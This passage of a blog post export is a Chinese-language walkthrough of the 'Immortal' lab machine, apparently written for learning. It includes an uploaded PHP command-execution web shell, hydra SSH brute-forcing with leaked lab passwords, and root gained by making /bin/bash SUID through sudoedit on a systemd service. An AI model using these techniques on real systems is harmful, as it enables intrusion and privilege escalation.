src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111930851.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240411172356044\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>\u4ec0\u4e48\u4e2a\u60c5\u51b5\u3002\u3002\u4f20\u4e86\u4e00\u4e2a\u7a7a\u6587\u4ef6\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111930852.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111930852.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240411174552356\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u6210\u529f\u4e86\u3002\u3002\u3002\u3002<\/p>\n<p>\u5c1d\u8bd5\u4e0d\u52a0php:<\/p>\n<pre><code class=\"language-bash\">&lt;?=`$_GET[0]` ?&gt;<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111930853.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111930853.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240411174825017\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>\u4e0d\u884c\u6b38\u3002\u3002\u3002\u3002<code>.txt<\/code>\u4e5f\u53ef\u4ee5\u4f20\uff0c\u8bd5\u63a2\u4e00\u4e0b\u6709\u5565\u4e0d\u80fd\u5305\u542b\uff0c\u76f4\u63a5\u5199<code>12345<\/code>\uff0c<code>abcd<\/code>\u90fd\u4e0d\u884c\uff0cmad\u91cd\u542f\u9776\u673a\uff0c\u7fa4\u4e3b\u7ed9\u4e88\u4e86\u5e2e\u52a9\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111930854.jpg'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111930854.jpg\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"img\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u77e5\u9053\u95ee\u9898\u5728\u54ea\u4e86\uff0c\u6211\u7684\u6587\u4ef6\u90fd\u662f\u4e00\u4e2a\u540d\u5b57\uff0c\u6293\u5305\u4e0d\u65ad\u4fee\u6539\u540e\u7f00\uff0c\u8fd9\u91cc\u53ef\u80fd\u9700\u8981\u4e00\u6b65\u5c31\u5bf9\uff0c\u4e0d\u80fd\u4fee\u6539\u540e\u7f00\uff0c\u6211\u521a\u521a\u4e00\u6fc0\u52a8\u628a\u628a\u9776\u673a\u5220\u6389\u4e86\uff0c\u91cd\u65b0\u4e0a\u4f20\uff0c\u6210\u529f\u3002\u3002\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111930855.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111930855.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240411183752767\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u56de\u53bb\u89e6\u53d1\u4e00\u4e0b\u53d1\u73b0\u53ef\u4ee5\u4e86\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111930856.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111930856.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240411184339047\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111930857.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111930857.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240411184326699\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@Immortal:\/$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/bin\/gpasswd\n\/usr\/bin\/mount\n\/usr\/bin\/newgrp\n\/usr\/bin\/umount\n\/usr\/bin\/chfn\n\/usr\/bin\/chsh\n\/usr\/bin\/sudo\n\/usr\/bin\/su\n\/usr\/bin\/passwd\n(remote) www-data@Immortal:\/$ find \/ -writable -type f 2&gt;\/dev\/null\n........\n\/var\/www\/html\/longlife17\/tests\/test20.txt\n\/var\/www\/html\/longlife17\/chat\/message.txt\n\/var\/www\/html\/longlife17\/chat\/revershell.phtml\n\/var\/www\/html\/longlife17\/chat\/message3.txt\n\/var\/www\/html\/longlife17\/chat\/message2.txt\n\/var\/www\/html\/longlife17\/important\/important.txt\n\/opt\/immortal.py\n(remote) www-data@Immortal:\/$ vim \/opt\/immortal.py\nbash: vim: command not found\n(remote) www-data@Immortal:\/$ vi \/opt\/immortal.py\n(remote) www-data@Immortal:\/$ vi \/opt\/immortal.py\n(remote) www-data@Immortal:\/$ sudo -l\n\nWe trust you have received the usual lecture from the local System\nAdministrator. It usually boils down to these three things:\n\n    #1) Respect the privacy of others.\n    #2) Think before you type.\n    #3) With great power comes great responsibility.\n\n[sudo] password for www-data: \nsudo: a password is required\n(remote) www-data@Immortal:\/$ cd \/home\n(remote) www-data@Immortal:\/home$ ls\ndavid  drake  eric\n(remote) www-data@Immortal:\/home$ cd david\/\nbash: cd: david\/: Permission denied\n(remote) www-data@Immortal:\/home$ cd drake\/\n(remote) www-data@Immortal:\/home\/drake$ ls -la  \ntotal 32\ndrwxr-xr-x 4 drake drake 4096 Feb 29 18:58 .\ndrwxr-xr-x 5 root  root  4096 Feb 27 20:50 ..\ndrwxr-xr-x 2 drake drake 4096 Feb 27 20:59 ...\n-rw-r--r-- 1 drake drake  220 Feb 27 20:50 .bash_logout\n-rw-r--r-- 1 drake drake 3526 Feb 27 20:50 .bashrc\ndrwxr-xr-x 3 drake drake 4096 Feb 27 20:58 .local\n-rw-r--r-- 1 drake drake  807 Feb 27 20:50 .profile\n-rw-r--r-- 1 drake drake   20 Feb 27 20:58 user.txt\n(remote) www-data@Immortal:\/home\/drake$ cat user.txt \nnothinglivesforever\n(remote) www-data@Immortal:\/home\/drake$ cd ..\/eric\/\n(remote) www-data@Immortal:\/home\/eric$ ls -la\ntotal 28\ndrwxr-xr-x 3 eric eric 4096 Feb 29 18:58 .\ndrwxr-xr-x 5 root root 4096 Feb 27 20:50 ..\n-rw-r--r-- 1 eric eric  220 Feb 27 20:50 .bash_logout\n-rw-r--r-- 1 eric eric 3526 Feb 27 20:50 .bashrc\ndrwxr-xr-x 3 eric eric 4096 Feb 27 20:59 .local\n-rw-r--r-- 1 eric eric  134 Feb 27 20:59 .note.txt\n-rw-r--r-- 1 eric eric  807 Feb 27 20:50 .profile\n(remote) www-data@Immortal:\/home\/eric$ cat .note.txt \nI think I should tell David that this immortality thing is not a good idea, although I&#039;m sad to tell him, he&#039;s so excited about it...<\/code><\/pre>\n<h3>\u4e0a\u4f20pspy64\u4ee5\u53calinpeas.sh<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@Immortal:\/tmp$ ls\nlinpeas.sh  pspy64\n(remote) www-data@Immortal:\/tmp$ rm linpeas.sh \n(remote) www-data@Immortal:\/tmp$ rm pspy64 \n(remote) www-data@Immortal:\/tmp$ \n(local) pwncat$ lpwd\n\/home\/kali\/temp\/immortal\n(local) pwncat$ lcd ..\n(local) pwncat$ upload linpeas.sh\n.\/linpeas.sh \u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501 100.0% \u2022 860.5\/860.5 KB \u2022 ? \u2022 0:00:00[06:57:52] uploaded 860.55KiB in 0.59 seconds\n(local) pwncat$ upload pspy64\n.\/pspy64 \u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501 100.0% \u2022 4.5\/4.5 MB \u2022 3.5 MB\/s \u2022 0:00:00[06:57:59] uploaded 4.47MiB in 1.56 seconds\n(local) pwncat$\n(remote) www-data@Immortal:\/tmp$ chmod +x *\n(remote) www-data@Immortal:\/tmp$ .\/linpeas.sh<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111930858.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111930858.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240411185925732\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5636\u3002\u3002\u3002\u3002\u3002<\/p>\n<h3>...\u4e5f\u662f\u6587\u4ef6\u5939\u540d\u3002\u3002\u3002\u3002<\/h3>\n<p>\u624b\u52a8\u6536\u96c6\uff0c\u5728<code>drake<\/code>\u53d1\u73b0\u4e86\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) www-data@Immortal:\/home\/drake$ ls\nuser.txt\n(remote) www-data@Immortal:\/home\/drake$ ls -la\ntotal 32\ndrwxr-xr-x 4 drake drake 4096 Feb 29 18:58 .\ndrwxr-xr-x 5 root  root  4096 Feb 27 20:50 ..\ndrwxr-xr-x 2 drake drake 4096 Feb 27 20:59 ...\n-rw-r--r-- 1 drake drake  220 Feb 27 20:50 .bash_logout\n-rw-r--r-- 1 drake drake 3526 Feb 27 20:50 .bashrc\ndrwxr-xr-x 3 drake drake 4096 Feb 27 20:58 .local\n-rw-r--r-- 1 drake drake  807 Feb 27 20:50 .profile\n-rw-r--r-- 1 drake drake   20 Feb 27 20:58 user.txt\n(remote) www-data@Immortal:\/home\/drake$ cd ...\n(remote) www-data@Immortal:\/home\/drake\/...$ ls\npass.txt\n(remote) www-data@Immortal:\/home\/drake\/...$ ls -la\ntotal 12\ndrwxr-xr-x 2 drake drake 4096 Feb 27 20:59 .\ndrwxr-xr-x 4 drake drake 4096 Feb 29 18:58 ..\n-rw-r--r-- 1 drake drake  134 Feb 27 20:59 pass.txt\n(remote) www-data@Immortal:\/home\/drake\/...$ cat pass.txt \nnetflix : drake123\namazon : 123drake\nshelldred : shell123dred (f4ns0nly)\nsystem : kevcjnsgii\nbank : myfavouritebank\nnintendo : 123456<\/code><\/pre>\n<p>\u5c06\u5176\u6539\u4e3a\uff1a<\/p>\n<pre><code class=\"language-text\">netflix\ndrake123\namazon\n123drake\nshelldred\nshell123dred\nf4ns0nly\nsystem\nkevcjnsgii\nbank\nmyfavouritebank\nnintendo\n123456<\/code><\/pre>\n<p>\u8fdb\u884c\u7206\u7834\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/immortal]\n\u2514\u2500$ hydra -L username.txt -P password.txt ssh:\/\/172.20.10.7\nHydra v9.5 (c) 2023 by van Hauser\/THC &amp; David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2024-04-11 07:11:47\n[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 39 login tries (l:3\/p:13), ~3 tries per task\n[DATA] attacking ssh:\/\/172.20.10.7:22\/\n[22][ssh] host: 172.20.10.7   login: drake   password: kevcjnsgii\n1 of 1 target successfully completed, 1 valid password found\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2024-04-11 07:11:55<\/code><\/pre>\n<p>\u8dd1\u51fa\u6765\u4e86\u3002\u3002\u3002\u3002<\/p>\n<pre><code class=\"language-apl\">drake\nkevcjnsgii<\/code><\/pre>\n<h3>\u5207\u6362eric\u7528\u6237<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111930859.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111930859.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240411191351138\" \/><\/div><\/p>\n<p>\u91cc\u9762\u7684\u53cd\u5f39shell\u662f\u6ca1\u6709\u7684\uff0c\u6211\u4e00\u5f00\u59cb\u5728\u4e0a\u9762\u6539\u4e86\uff0c\u5e0c\u671b\u4ed6\u662f\u4e00\u4e2aroot\u6267\u884c\u7684\u5b9a\u65f6\u4efb\u52a1\uff0c\u4f46\u662f\u4e0d\u662f\uff0c\u5c1d\u8bd5\u7528<code>eric<\/code>\u7528\u6237\u6267\u884c\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111930860.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111930860.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240411191611513\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111930861.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111930861.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240411191626428\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u5207\u6362\u4e00\u4e0b\uff0c\u4fe1\u606f\u641c\u96c6\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) eric@Immortal:\/home$ sudo -l\nMatching Defaults entries for eric on Immortal:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser eric may run the following commands on Immortal:\n    (root) NOPASSWD: sudoedit \/etc\/systemd\/system\/immortal.service\n    (root) NOPASSWD: \/usr\/bin\/systemctl start immortal.service\n    (root) NOPASSWD: \/usr\/bin\/systemctl stop immortal.service\n    (root) NOPASSWD: \/usr\/bin\/systemctl enable immortal.service\n    (root) NOPASSWD: \/usr\/bin\/systemctl disable immortal.service\n    (root) NOPASSWD: \/usr\/bin\/systemctl daemon-reload<\/code><\/pre>\n<p>\u7f16\u8f91\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111930862.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111930862.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240411192926448\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u8fd9\u4e2a\u6587\u4ef6\u6743\u9650\u9887\u9ad8\uff0c\u4e0d\u7ba1\u7528\u5565\u65b9\u5f0f\u90fd\u53ef\u4ee5\u7684\uff0c\u53cd\u5f39shell\u76f4\u63a5\u63d0\u53d6\u90fd\u884c\u7684\uff0c\u6211\u8fd9\u91cc\u5c31\u7ed9bash\u52a0\u4e86\u4e2asuid\u6743\u9650\u4e86\u3002<\/p>\n<p>\u8f93\u5165<code>ctrl +x <\/code>\u6309\u4e00\u4e0b<code>y<\/code>\uff0c\u518d\u6309\u4e00\u4e0b<code>enter<\/code>\u3002<\/p>\n<pre><code class=\"language-bash\">(remote) eric@Immortal:\/home$ sudo \/usr\/bin\/systemctl stop immortal.service\n(remote) eric@Immortal:\/home$ sudo \/usr\/bin\/systemctl start immortal.service\n(remote) eric@Immortal:\/home$ ls -l \/bin\/bash\n-rwsr-sr-x 1 root root 1234376 Mar 27  2022 \/bin\/bash\n(remote) eric@Immortal:\/home$ \/bin\/bash -p\n(remote) root@Immortal:\/home# cd \/root\n(remote) root@Immortal:\/root# ls\ncimmortal_formula.txt  root.txt\n(remote) root@Immortal:\/root# cat cimmortal_formula.txt\ncat: cimmortal_formula.txt: No such file or directory\n(remote) root@Immortal:\/root# ls -la\ntotal 32\ndrwx------  3 root root 4096 Feb 29 19:46 .\ndrwxr-xr-x 18 root root 4096 Feb 27 20:20 ..\n-rw-r--r--  1 root root   23 Feb 29 19:46 .b\n-rw-------  1 root root    0 Feb 29 20:01 .bash_history\n-rw-r--r--  1 root root  571 Apr 10  2021 .bashrc\n-rw-r--r--  1 root root  187 Feb 27 21:02 immortal_formula.txt\ndrwxr-xr-x  3 root root 4096 Feb 27 20:51 .local\n-rw-r--r--  1 root root  161 Jul  9  2019 .profile\n-rw-r--r--  1 root root   16 Feb 27 21:00 root.txt\n(remote) root@Immortal:\/root# cat *\nThe formula for immortality is to live in someone else&#039;s mind.\n\nThank you very much for completing this machine, mortal person.\n\nPD:Remember to eat healthy, drink plenty and sleep well.\nfiNally1mMort4l<\/code><\/pre>\n<h2>\u989d\u5916\u6536\u83b7<\/h2>\n<p><a href=\"https:\/\/www.bilibili.com\/video\/BV13m411B7wq\/?spm_id_from=333.999.0.0&amp;vd_source=8981ead94b755f367ac539f6ccd37f77\">\u7fa4\u4e3b\u5e08\u5085\u7684wp<\/a>\u4e2d\u5229\u7528\u6b63\u5219\u8fdb\u884c\u4e86\u5206\u79bb\uff1a<\/p>\n<pre><code class=\"language-bash\">cat pass.txt | grep -P &#039;[^ :\\(\\)]+&#039; -o<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>immortal \u4eca\u5929\u65b0\u4e0a\u7684\u673a\u5b50\uff01 28\u5e08\u5085\u592a\u5f3a\u8fa3\uff01 \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf rustscan -a 172.20 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-530","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/530","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=530"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/530\/revisions"}],"predecessor-version":[{"id":531,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/530\/revisions\/531"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=530"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=530"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=530"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}